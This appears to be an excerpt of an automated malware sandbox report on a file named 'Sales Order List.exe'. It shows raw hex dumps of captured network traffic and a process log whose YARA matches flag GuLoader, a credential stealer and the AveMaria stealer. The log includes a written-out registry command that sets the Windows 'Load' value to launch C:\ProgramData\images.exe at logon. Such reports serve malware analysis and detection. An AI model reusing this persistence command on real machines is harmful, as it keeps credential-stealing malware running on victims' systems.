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                                                                                            2021-11-22 18:40:22 UTC146INData Raw: 4a e0 af be 18 b3 9e 85 ea f3 74 79 8a f3 db 89 3d 35 c2 20 a2 62 2f 79 25 56 86 c2 55 98 ed 5b 52 21 00 a3 ae 6f 28 f5 74 07 35 dc ae b7 11 12 a9 fe 1a d2 58 00 c0 7a cc 16 98 4e 9a fd 4d 1c 4c df 41 19 df 04 2c 16 74 a8 6b 19 08 bd c9 2b bb 16 49 33 0a cd ce 85 d8 35 4e fb 73 4d 53 c3 31 6b 13 ca ca 74 8b e7 ac 98 ff d1 02 d8 92 b2 ac 47 00 35 6e b5 db f5 74 1f 68 6f af ee 19 1d eb 7b f2 35 33 a3 31 0c db 8d 98 d0 91 34 d8 0b d5 6d 83 c5 c3 87 58 1c d2 0a 62 02 99 51 f4 18 22 95 5c 06 fe 87 10 7d 3f 25 28 46 42 1c 4c da a9 2a 4d 61 c4 ca fb 42 6c a9 ec 81 36 83 27 37 d3 b8 d1 af e0 d3 a0 b9 d9 d7 6c 99 7f 7e 63 0f 23 12 6f 36 3e 40 98 2b da e9 58 c4 23 df 36 5b 81 68 5d 5a 47 a6 16 8f e2 24 d7 84 55 b7 8d 4b b7 e3 87 fa ea 8b 56 5b 90 24 fd fc f0 7f 78
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                                                                                            2021-11-22 18:40:22 UTC148INData Raw: 6b 5f 0f dc 90 20 3e 0b 63 a2 a0 85 c8 6b f5 70 26 48 8a b4 13 5c ff 6a 16 de 2e 8b 93 bd 13 8c 0f ad e3 41 ac 18 54 8b 05 c0 97 71 76 76 97 65 ac ac 4a 5a b1 18 4a 11 f2 3c 0e 5f 97 da 90 a2 0f 01 e1 20 81 8e f0 ff 44 46 ee 98 b0 b0 44 85 b4 3b 02 f2 91 e0 b7 47 64 32 a0 a9 89 6c 5a 9c aa 64 58 0d 85 42 f1 62 f1 1b 27 eb c0 c1 47 67 8e 71 dc 7f 26 aa d2 64 14 1f 5d db a0 74 6c 85 a8 bf a0 18 0b 76 23 1e cd 2b b1 3b 84 36 08 98 07 17 f9 ab f3 f9 2f f1 23 d2 f5 dd 5c 40 f2 69 1f 4b 8c 83 bc c3 7e 27 2d d9 38 67 88 63 81 67 65 a5 af 11 d9 da 3b 15 4c ee 22 be 16 aa 44 90 16 e3 cf e2 d7 3c 95 27 8b 54 35 6f 52 86 a5 00 03 65 c4 1c 9a f8 db 88 e1 78 e0 7a 86 31 0a ce a7 6d 5e 5f f8 cf 43 81 cf 25 bc 55 fb e1 82 e9 67 c2 db 4a 5d cc 34 ca 97 69 73 04 75 2e ad
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                                                                                            2021-11-22 18:40:22 UTC149INData Raw: 06 6b 6d 76 cf 80 a1 50 47 a8 67 4e ea ec be 15 f9 83 a3 f2 e2 60 79 8a f3 df 9e 3c 33 96 32 bb 60 1d 30 26 7e 86 cf 58 98 ff 7a 52 27 49 90 c7 76 2c f6 7d 44 26 93 b5 bb 3c 15 a7 ef 0a d7 48 12 ef 5b be 7b 86 4b 85 d7 71 06 48 d6 5a 24 cf 69 1f 1a 6c b6 06 0a 4f a4 c5 30 ba 71 4a 19 02 cb f2 95 ac 05 4a f9 58 71 50 c0 31 69 24 af d1 5e 8e fe 90 ac 8b e1 0e c2 a9 b0 a4 1c 1a 31 18 a7 fb f5 5e 17 78 05 a7 f1 3e 15 d4 7d c7 72 21 b6 11 06 fe 96 b2 d0 e5 1d d4 19 ff 43 86 c2 d8 e8 41 12 f1 14 68 66 c0 4f fb 03 2a b8 1c 2c f2 97 3d 57 3c 12 05 59 5f 2c 01 de af 5c 45 41 ce e4 d1 43 5d 96 fb 9d 37 b6 25 2a a7 8e b8 b6 e4 d0 a9 fa d0 90 7f 91 46 6e 5e 2c 01 04 68 12 2b 57 f7 34 e7 e8 49 ff 17 ab 0e 4a 92 63 14 43 69 ad 0f a7 f4 78 d5 9f 65 bb ba 4a 94 ac 80 f6
                                                                                            Data Ascii: kmvPGgN`y<32`0&~XzR'Iv,}D&<H[{KqHZ$ilO0qJJXqP1i$^1^x>}r!CAhfO*,=W<Y_,\EAC]7%*Fn^,h+W4IJcCixeJ
                                                                                            2021-11-22 18:40:22 UTC150INData Raw: d0 f9 dc ee f0 6b 9f c6 0a 37 7b 67 44 0e bd 88 3d 14 0b 62 88 a4 e0 d1 02 f6 74 33 49 d6 90 17 5e d9 4a 0d de 0e 81 8c 9c 02 f8 19 a5 f9 57 e3 1a 49 b7 0d de 87 3e 69 6b ef 77 b7 91 42 43 96 59 53 04 f6 36 2d 6e 86 fc 94 b8 17 13 93 39 ec bd e3 ff 68 67 e8 98 82 b9 5c d5 aa 26 0f f7 fc f3 f0 44 64 1b b6 f1 b7 63 5f 8d 84 7d 40 5e 8d 5b e6 6e f1 3b 3a 99 c5 c5 5f 76 95 65 db 47 43 a9 eb 66 18 0b 5b 94 ae 72 79 81 a8 99 d5 1d 10 7d 20 07 fd 64 b5 31 f2 3e 2a b9 12 37 f7 9d cf fa 2d e3 41 c4 ff d8 63 4c e2 22 72 51 b9 94 aa e7 49 3f 11 df 27 31 8a 62 a0 6b 73 ce 9b 0a d2 d6 22 14 62 ee 2a a6 1e 88 55 ca 28 eb ef d5 cb 3b a3 38 8b 35 36 6b 24 8e 87 21 16 43 c1 3f 81 fa c5 88 ff 1d df 76 89 38 02 d8 89 77 5a 65 f4 d1 4c fc d1 23 a4 51 d8 94 9b d1 5d d3 da 44
                                                                                            Data Ascii: k7{gD=bt3I^JWI>ikwBCYS6-n9hg\&Ddc_}@^[n;:_veGCf[ry} d1>*7-AcL"rQI?'1bks"b*U(;856k$!C?v8wZeL#Q]D
                                                                                            2021-11-22 18:40:22 UTC152INData Raw: 0d 04 8a d2 08 95 59 0d 9b 6d 77 63 38 08 02 8a f6 c4 3e 33 a8 10 27 84 81 d3 71 d7 f7 ca 9f 87 33 1c fe b6 a9 fb 52 47 96 45 da 16 78 79 48 3f e2 ab 1a ed 99 1c 37 55 49 e7 ae 18 41 9b 19 6a 51 f2 c3 de 75 7b e6 8b 6e 95 3d 74 89 3e cc 7b f1 2a f3 b2 38 68 0b ba 35 57 aa 69 68 73 02 db 6b 6e 61 d3 a4 46 df 38 24 5a 6e a4 81 f0 ac 72 2b 8f 3d 38 3e 87 54 1d 60 ca a7 1d ef 8e e3 ed 8b 96 67 ac c4 dd c0 32 6d 50 6e c2 b2 9b 19 72 0c 41 c2 87 7d 74 a4 0e 86 72 56 d7 67 63 b7 f8 f5 b5 91 59 b1 6f bc 22 a3 3a 63 63 63 6b 14 3c 0d 89 26 bd 48 01 46 37 73 6b d6 60 93 33 3f a6 39 ea 79 f0 ed cd 6f 1a 20 08 a0 20 58 2f 93 a4 85 a1 13 b5 cb 2a df 26 1f c1 8d be 4f d0 84 8d fe 7b 6f 27 9c 7d cf 24 e4 dc 1b 19 11 3b 47 06 75 9b 2e 22 3c db 61 c6 52 a9 ab c8 7b e2 47
                                                                                            Data Ascii: Ymwc8>3'q3RGExyH?7UIAjQu{n=t>{*8h5WihsknaF8$Znr+=8>T`g2mPnrA}trVgcYo":ccck<&HF7sk`3?9yo X/*&O{o'}$;Gu."<aR{G
                                                                                            2021-11-22 18:40:22 UTC153INData Raw: c8 36 6c 98 21 72 3b 90 ac d4 5f b1 8b b9 a6 95 0a fb a3 78 37 0c 06 32 6b f2 fd 49 46 6e 11 ed d0 e0 a6 6b 98 19 5e 2d f8 e7 76 28 bc 05 78 aa 5c e4 ff f9 76 f8 6e c4 8f 32 ac 6f 3d e5 68 ad f3 5f 1b 1f ef 00 de ff 2f 2e f2 77 24 65 80 53 62 1b f2 ae f1 cb 63 72 e1 4d ec ca 82 89 0d 28 9d ec d1 dc 28 85 c3 52 6c 9f fc 84 99 2a 09 76 d2 df c0 02 29 e8 cb 08 34 0d e8 2f b6 07 85 58 52 99 b2 a4 29 13 da 10 af 14 26 dd bb 0a 79 72 39 f5 cd 19 2b e0 dc fc d5 6a 79 13 4d 6a 99 4a c2 50 84 5b 65 cc 66 64 92 e9 9f 96 4c 9a 23 a5 9c b3 31 2d 96 47 72 26 d8 e2 cf a8 3c 4b 42 ba 53 67 e5 0e d5 06 16 ce ec 63 bc bb 4f 70 4c 99 4b d0 7b c7 20 be 7b 8e 9b 83 a4 57 d6 55 ee 35 41 0a 52 eb c8 54 62 16 af 4f f3 9f b5 e9 8d 78 97 13 e8 5c 67 aa 89 00 33 0b 99 bc 28 d2 a6
                                                                                            Data Ascii: 6l!r;_x72kIFnk^-v(x\vn2o=h_/.w$eSbcrM((Rl*v)4/XR)&yr9+jyMjJP[efdL#1-Gr&<KBSgcOpLK{ {WU5ARTbOx\g3(
                                                                                            2021-11-22 18:40:22 UTC154INData Raw: 64 76 78 55 68 2e c4 3b 48 b3 c5 3c f9 bb d6 3a bd 6b 4b a9 20 45 c0 0a a5 30 3d c4 1d 0c d0 9a fd 15 92 b2 f3 42 fd c4 fe ac b9 00 47 cd d3 9a 94 61 3e a5 8c e9 c5 4b a4 7b d8 d1 bb 2e f8 ad 06 03 78 7d d5 9a 2f 75 a5 2d 21 65 a2 f7 8b 41 f2 d2 05 5a 06 09 e9 bd 9c f8 dc c5 9e c7 0b 0c d6 3f 71 01 87 9e bc 5c 91 36 3c 5f 82 55 ce 91 6c ea 17 11 6e 5b e5 b4 b6 99 39 1e d7 08 65 0b e0 61 64 55 4c 92 97 da 00 d6 7f be 00 52 36 f1 43 f5 90 58 f6 5b 68 87 5f 2c 84 39 48 f4 a6 4b 4e 92 5d b0 12 60 b1 51 16 81 65 c3 0a a7 9d 87 8f 8a c4 c0 43 b9 e9 01 70 a8 6f 32 2d d9 02 ad 4a 78 bf 45 31 a0 8d 4e 4b 7d d3 53 c2 1b 73 39 97 f6 71 18 64 98 3b 8c f7 20 36 b1 d1 7c df 79 07 ea 90 81 4b b4 14 fd 38 8d 74 31 20 09 dd 2e ac 7f 97 25 ab 60 22 a2 55 89 94 0b af 6c 95
                                                                                            Data Ascii: dvxUh.;H<:kK E0=BGa>K{.x}/u-!eAZ?q\6<_Uln[9eadULR6CX[h_,9HKN]`QeCpo2-JxE1NK}Ss9qd; 6|yK8t1 .%`"Ul
                                                                                            2021-11-22 18:40:22 UTC155INData Raw: da 3d 8b 4e b7 d1 81 15 5d 73 68 fb 72 5f d5 12 10 08 ff 9f 5c 6c 27 b8 09 95 2c 39 35 90 a3 04 e4 35 c0 58 f6 c9 44 72 75 25 d5 e4 a2 92 30 ac 71 6a 5a cc 66 42 8a 88 a8 4c 6a 68 09 cb 03 42 ff 5b d0 ba 13 99 41 08 9d 5d 5f c6 18 2d ea d9 07 e9 e2 18 4d ca fb 1c c1 b8 58 5b 3f cb f5 c8 4f 5a fc d8 d1 d5 9f b8 d4 37 88 a7 30 eb 35 12 da f8 3d 57 0a c7 22 a2 c1 32 86 e9 21 fb 26 15 d9 f7 c5 08 fe d4 2f 8b 4b b8 c9 6f 36 8f 9f 16 13 3a 10 af 3c 27 dd bb 1a 49 53 09 8e fd d3 1b ce ed 92 e4 f2 48 b7 7c c6 a8 fc f3 ec b5 be 54 27 57 95 a3 1e ae 94 7e 92 11 b6 ae aa 03 09 a4 6d 40 13 ea d9 fd ee 0e 07 70 ed 61 3a d7 66 e7 68 24 b6 de 1d 8e 31 7d ff 7e 0c 79 79 49 73 12 7e 49 4b a9 4f 96 8f e4 8b dc d7 73 e2 60 11 fa 40 51 25 9c 03 c0 f3 86 6c be b6 a4 09 dc 43
                                                                                            Data Ascii: =N]shr_\l',955XDru%0qjZfBLjhB[A]_-MX[?OZ705=W"2!&/Ko6:<'ISH|T'W~m@pa:fh$1}~yyIs~IKOs`@Q%lC
                                                                                            2021-11-22 18:40:22 UTC157INData Raw: 8a 54 46 91 64 ff 44 62 9d dc 8f ee 1a 88 16 8e b0 28 d3 9a a3 12 24 3c a4 ea 33 ad 0e 35 09 55 aa 5b d5 30 f0 b2 09 fc 3a 0a 87 29 a2 bd 0e ea e5 ee 31 f3 45 be dc 25 b8 8c d9 c1 ea 7d 56 7f 0b 2c 96 43 bb 05 1b 91 03 d6 bf 27 75 6e 34 dc 1e 23 99 a0 c4 51 bb c9 2c e5 6d 47 c2 b7 3b a9 59 48 e2 02 be 47 f0 17 d8 8f 70 55 46 87 66 6a cd 54 fe 4e a7 e6 c7 53 d2 ee 6a 7b 32 05 36 64 4e 9a d2 ce f6 4c 4b b1 54 06 50 b9 2d 23 1e f4 3d 23 70 b0 47 d3 22 a8 c9 92 71 e3 0e 0c b8 6e 97 fc b5 a4 17 4d 19 7e 90 b8 1c 4b 31 31 26 4d e8 e8 b6 5c 47 c7 0f 8a 91 19 b0 6f 78 22 f6 b1 9e d8 67 4b c7 49 75 32 73 08 30 45 8b c1 bd 5b 0c d2 be 03 4c 63 43 1b 23 48 1b 9a ed 19 13 3b 9a 90 f4 04 51 d7 dd c1 18 d1 c1 61 5f fc 2a f2 2c 8d 63 a4 05 8d bf c3 8b 38 c9 71 a2 52 f5
                                                                                            Data Ascii: TFdDb($<35U[0:)1E%}V,C'un4#Q,mG;YHGpUFfjTNSj{26dNLKTP-#=#pG"qnM~K11&M\Gox"gKIu2s0E[LcC#H;Qa_*,c8qR
                                                                                            2021-11-22 18:40:22 UTC158INData Raw: 37 6b 79 60 5a 14 3f 46 21 2b 72 7b 0f 23 7c 19 e3 32 27 a1 41 75 c8 36 6c 98 21 72 3b 90 ac d4 5f b1 8b b9 a6 95 0a fb a3 78 37 0c 06 32 6b f2 fd 49 46 6e 11 ed d0 e0 a6 6b 98 19 5e 2d f8 e7 76 28 bc 05 78 aa 5c e4 ff f9 76 f8 6e c4 8f 32 ac 6f 3d e5 68 ad f3 5f 1b 1f ef 00 de ff 2f 2e f2 77 24 65 80 53 62 1b f2 ae f1 cb 63 72 e1 4d ec ca 82 89 0d 28 9d ec d1 dc 28 85 c3 52 6c 9f fc 84 99 2a 09 76 d2 df c0 02 29 e8 cb 08 34 0d e8 2f b6 07 85 58 52 99 b2 a4 29 13 da 10 af 14 26 dd bb 0a 79 72 39 f5 cd 19 2b e0 dc fc d5 6a 79 13 4d 6a 99 4a c2 50 84 5b 65 cc 66 64 92 e9 9f 96 4c 9a 23 a5 9c b3 31 2d 96 47 72 26 d8 e2 cf a8 3c 4b 42 ba 53 67 e5 0e d5 06 16 ce ec 63 bc bb 4f 70 4c 99 4b d0 7b c7 20 be 7b 8e 9b 83 a4 57 d6 55 ee 35 41 0a 52 eb c8 54 62 16 af
                                                                                            Data Ascii: 7ky`Z?F!+r{#|2'Au6l!r;_x72kIFnk^-v(x\vn2o=h_/.w$eSbcrM((Rl*v)4/XR)&yr9+jyMjJP[efdL#1-Gr&<KBSgcOpLK{ {WU5ARTb

                                                                                            Code Manipulations



                                                                                            Click to jump to process

                                                                                            System Behavior


                                                                                            Start time:19:39:40
                                                                                            Start date:22/11/2021
                                                                                            Path:C:\Users\user\Desktop\Sales Order List.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Sales Order List.exe"
                                                                                            File size:192512 bytes
                                                                                            MD5 hash:80BAD0903EE7EC98805678673720CFD9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Visual Basic
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmp, Author: Joe Security


                                                                                            Start time:19:40:00
                                                                                            Start date:22/11/2021
                                                                                            Path:C:\Users\user\Desktop\Sales Order List.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Sales Order List.exe"
                                                                                            File size:192512 bytes
                                                                                            MD5 hash:80BAD0903EE7EC98805678673720CFD9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, Author: Joe Security


                                                                                            Start time:19:40:23
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):false
                                                                                            File size:4849904 bytes
                                                                                            MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language


                                                                                            Start time:19:40:33
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                                                                                            File size:236544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language


                                                                                            Start time:19:40:33
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):true
                                                                                            File size:192512 bytes
                                                                                            MD5 hash:80BAD0903EE7EC98805678673720CFD9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Visual Basic
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000000.125891818807.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.126072449802.0000000002330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 40%, ReversingLabs


                                                                                            Start time:19:40:33
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            File size:875008 bytes
                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language


                                                                                            Start time:19:40:33
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
                                                                                            File size:59392 bytes
                                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language


                                                                                            Start time:19:40:36
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
                                                                                            File size:482640 bytes
                                                                                            MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Visual Basic


                                                                                            Start time:19:40:46
                                                                                            Start date:22/11/2021
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772
                                                                                            File size:482640 bytes
                                                                                            MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Visual Basic


                                                                                            Code Analysis

                                                                                            Reset < >